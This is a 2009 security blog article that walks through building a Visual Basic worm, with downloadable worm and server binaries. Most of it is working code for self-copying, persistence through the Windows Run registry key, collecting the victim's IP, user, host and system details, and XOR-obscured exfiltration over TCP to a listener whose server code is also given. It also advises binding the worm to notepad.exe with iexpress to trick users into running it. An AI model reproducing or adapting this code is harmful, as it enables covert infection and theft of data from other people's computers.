Bilbao Digital

Asociación para la Cualificación y el Aprendizaje Permanente

  • Full Screen
  • Wide Screen
  • Narrow Screen
  • Increase font size
  • Default font size
  • Decrease font size

My.worm (Visual Basic)

E-mail Imprimir PDF

Now that Vista leaves and people is willing to install Seven hoping UAC is no longer there, Im sure that Windows users will always get what they want. Usability and insecurity. Many, many people make money thanks to the Windows XP insecurity. Regular users saving a lot of time and, malicious users infecting the formers. Great scenario, keeping the money moving.

Here is an example of this business. A computer worm. Yep, this can be used to harm computers, spread payloads, information disclosure... and for educational purposes.

Risk disclaimer: (Please read very carefully)

There is no guarantees for the currency or accuracy of information are made. bilbaodigital.es's information is provided "as is", without warranty of any kind, whether expressed or implied. bilbaodigital.es and its authors make no guarantee and hold no responsibility for any damage, injury, loss of property, loss of data, loss of any and all resources, or any negative influence what-so-ever, that may result from any and all usage of the information found on bilbaodigital.es, or linked from bilbaodigital.es (including but not limited to bilbaodigital.es's articles). This includes but is not limited to downloadable software on bilbaodigital.es.

Negative consequences of your usage of the bilbaodigital.es website are solely your problem and your responsibility. All consequences of the usage of bilbaodigital.es do not involve bilbaodigital.es and its authors, at all, ever. You hold full responsibility for your actions.

Use bilbaodigital.es's information resources at your own risk.

Download Worm (replicates, modifies registry, encrypts and sends infromation) - md5 hash 5479efa37350f2c63dfd874e450fdc3f - virustotal.com results
Download Server (listens, waits for myworm.exe transmision and decrypts data) - md5 hash 6ae27d05ce325fdfb6da310b4b219c4b - virustotal.com results
15/12/2009

These five steps have been considered while developing this Visual Basic worm code.

1In a layer 8 error an user executes the malicious file.
First step from the victim point of view but last for developers. Iexpress.exe is a Windows tool that can be used to bind/join two executables and automatically run the programs contained inside. You can distribute any exe (myworm.exe) within a well know application (notepad.exe). Self-explanatory.

2Once done it replicates. Self copy to other filesystems.
Now the code must guarantee survival, copying itself to another location with different names/properties:

Dim nombre_archivo As String = System.IO.Path.GetFileName(Process.GetCurrentProcess().MainModule.FileName)
Dim archivo_origen As String = Process.GetCurrentProcess().MainModule.FileName
Dim archivo_destino As String = "C:\" + nombre_archivo

    Private Sub copia()
        If System.IO.File.Exists(archivo_destino) = False Then
            System.IO.File.Copy(archivo_origen, archivo_destino)
            MsgBox("File copied")
        End If
    End Sub

3Runs on startup, grants access via OS registry.
To execute the code on computer startup we can modify the registry:

Dim key As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)

    Private Sub registro()
        If key.GetValue(nombre_archivo) = "" Then
            key.SetValue(nombre_archivo, "C:\myworm.EXE")
            MsgBox("Registry added")
        End If
    End Sub

4Gathers information about users, computers and networks.
Now, you can read any file from the computer, obtain information provided by the programming language, ...

  • Public IP

  • Dim plaindata As String
        Function whatismyip()
            Dim uri As New Uri("http://www.whatismyip.org/")
            Dim request As WebRequest = WebRequest.Create(uri)
            Dim response As WebResponse = request.GetResponse()
            Dim stream As Stream = response.GetResponseStream()
            Dim reader As New StreamReader(stream)
            Dim myIP As String = reader.ReadToEnd()
            reader.Close()
            stream.Close()
            Return myIP
        End Function
            plaindata = ("IP Pública: " + whatismyip())
    
  • User name

  •         plaindata = plaindata + (" Nombre equipo/usuario: " + Environment.UserDomainName + "/" + Environment.UserName)
    
  • Computer name

  •         plaindata = plaindata + (" Información del equipo: " + Dns.GetHostName)
    
  • OS version

  •         plaindata = plaindata + (" SO/Versión: " + My.Computer.Info.OSFullName + "/" + My.Computer.Info.OSVersion)
    
  • Language and country code

  •         plaindata = plaindata + (" Idioma/Código: " + My.Computer.Info.InstalledUICulture.DisplayName + "/" + My.Computer.Info.InstalledUICulture.Name)
    
  • Time

  •         plaindata= plaindata + (" Hora: " + My.Computer.Clock.LocalTime)
    

    5Sends this information encrypted to a specific host/port using a TCP client-server arquitecture.
    We can encrypt this information before sending to another host with a simple XOR translation.

        Function XorString(ByVal targetString As String, ByVal maskValue As String) As String
            Dim Index As Integer = 0
            Dim ReturnValue As String = ""
            For Each CharValue As Char In targetString.ToCharArray
                ReturnValue = String.Concat(ReturnValue, Chr(Asc(CharValue) Xor Asc(maskValue.Substring(Index, 1))))
                Index = (Index + 1) Mod maskValue.Length
            Next
            Return ReturnValue
        End Function
    
    Dim encrypteddata = XorString(plaindata, "01010101")
    
    Now this information can be transferred to a specific port using a TCP client-server arquitecture.
    Client:
    Sub TCPClient()
            Dim tcpClient As New System.Net.Sockets.TcpClient
            Try
                tcpClient.Connect("Localhost", 2009)
            Catch e As Exception
                Console.WriteLine(e.ToString())
                Console.ReadLine()
            End Try
            Dim networkStream As NetworkStream = tcpClient.GetStream()
            If networkStream.CanWrite And networkStream.CanRead Then
                ' Do a simple write.
                Dim sendBytes As [Byte]() = Encoding.UTF8.GetBytes(infocrypted)
                networkStream.Write(sendBytes, 0, sendBytes.Length)
                ' Read the NetworkStream into a byte buffer.
                Dim bytes(tcpClient.ReceiveBufferSize) As Byte
                networkStream.Read(bytes, 0, CInt(tcpClient.ReceiveBufferSize))
                ' Output the data received from the host to the console.
                Dim returndata As String = Encoding.UTF8.GetString(bytes)
                Console.WriteLine("El servidor TCP devuelve: " + returndata.TrimEnd(" "))
            Else
                If Not networkStream.CanRead Then
                    Console.WriteLine("Could not write data to data stream")
                    tcpClient.Close()
                Else
                    If Not networkStream.CanWrite Then
                        Console.WriteLine("Could not read data from data stream")
                        tcpClient.Close()
                    End If
                End If
            End If
            ' Pause to let the user view the console output.
            Console.ReadLine()
    End Sub
    
    Multithread server:
       'DnsPermissionAttribute specifies permission to request information from Domain Name Servers.
         Class CTestTCPServer
            Shared Sub Main()
                Const portNumber As Integer = 2009
                Dim tcpListener As New TcpListener(portNumber)
                tcpListener.Start()
                Console.WriteLine("Esperando conexiones de clientes TCP...")
                While (True)
                    Try
                        'Accept the pending client connection and return a TcpClient for communication. 
                        Dim tcpClient As TcpClient = tcpListener.AcceptTcpClient()
                        Console.WriteLine("Conexión aceptada.-------------------")
                        ' Get the data stream.
                        Dim networkStream As NetworkStream = tcpClient.GetStream()
                        ' Read the data stream into a byte array.
                        Dim bytes(tcpClient.ReceiveBufferSize) As Byte
                        networkStream.Read(bytes, 0, CInt(tcpClient.ReceiveBufferSize))
                        ' Return the data received from the client to the console.
                        Dim clientdata As String = Encoding.UTF8.GetString(bytes)
                        Dim clientdataplain As String = XorString(clientdata, "01010101")
                        Console.WriteLine("El cliente ha enviado: " + clientdataplain.TrimEnd("1", "0"))
                        Dim responseString As String = "Correctamente conectado al servidor TCP."
                        Dim sendBytes As [Byte]() = Encoding.UTF8.GetBytes(responseString)
                        networkStream.Write(sendBytes, 0, sendBytes.Length)
                        Console.WriteLine(("Mensaje enviado por el servidor TCP: " + responseString))
                        'Close TcpClient.
                        tcpClient.Close()
                    Catch e As Exception
                        Console.WriteLine(e.ToString())
                        Console.ReadLine()
                    End Try
                End While
            End Sub
    
    

    Download Worm (replicates, modifies registry, encrypts and sends infromation) - md5 hash 5479efa37350f2c63dfd874e450fdc3f - virustotal.com results
    Download Server (listens, waits for myworm.exe transmision and decrypts data) - md5 hash 6ae27d05ce325fdfb6da310b4b219c4b - virustotal.com results
    15/12/2009

    Comentarios (0)add comment

    Escribir comentario
    menor | mayor
    password
     

    busy
You are here: Artículos Seguridad My.worm (Visual Basic)